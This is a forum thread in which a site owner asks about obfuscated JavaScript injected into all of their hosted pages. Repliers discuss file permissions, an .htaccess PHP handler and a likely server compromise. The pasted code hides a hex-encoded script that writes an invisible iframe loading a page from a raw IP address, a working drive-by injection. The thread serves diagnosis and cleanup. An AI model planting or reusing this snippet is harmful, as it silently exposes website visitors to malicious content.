Hello, I've noticed that in all of the websites that I own, the ones which are all hosted on the same webhost, a hidden code that I can't figure its actual meaning, had been implemented under the <BODY> tag in all of these websites. this is the code: <body><iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v47d9ab6266ff7(v47d9ab6267806){ return(parseInt(v47d9ab6267806,16));}function v47d9ab6268fed(v47d9ab62697e5){ function v47d9ab626afdc () {var v47d9ab626b7e3=2; return v47d9ab626b7e3;} var v47d9ab6269fde='';for(v47d9ab626a7d9=0; v47d9ab626a7d9<v47d9ab62697e5.length; v47d9ab626a7d9+=v47d9ab626afdc()){ v47d9ab6269fde+=(String.fromCharCode(v47d9ab6266ff7(v47d9ab62697e5.substr(v47d9ab626a7d9, v47d9ab626afdc()))));}return v47d9ab6269fde;} document.write(v47d9ab6268fed('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D31363233643435207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3439343530292B27323833636461336333625C272077696474683D353735206865696768743D3836207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script> could you tell me what does this script do, and who could have implemented this????
777 is a code for permissions on *nix filesystems. http://en.wikipedia.org/wiki/File_system_permissions When the last number is 7, it means anyone who has an account on that server can read/write/execute in that directory or file. Basicly this means if you're on shared hosting and someone who has a shared hosting account on the same server knows your file paths, they can modify that section of your filesystem as if it was their own. Here's one method of looking for specific permission masks. http://www.grymoire.com/Unix/Find.html#uh-9 Now if you're on Windows hosting, it's a whole different process, as you should have discovered in that Wikipedia article.
I've deleted all the .php files I have found but the problem showed up again I've now also deleted these files from the trash, and found the code "AddHandler application/x-httpd-php .php .htm .html" in one of my .htaccess files - I would delete it too - could this be the reason?
Your hosting has been compromised by someone who got probally root access and is running the autoinsert script as a cronjob, you / your server administrator should defenitely check for backdoors like shells and update the running software. AddHandler application/x-httpd-php .php .htm .html Code (markup): This means it handles every htm/html/php file as a php file, so you can put php code in a html file.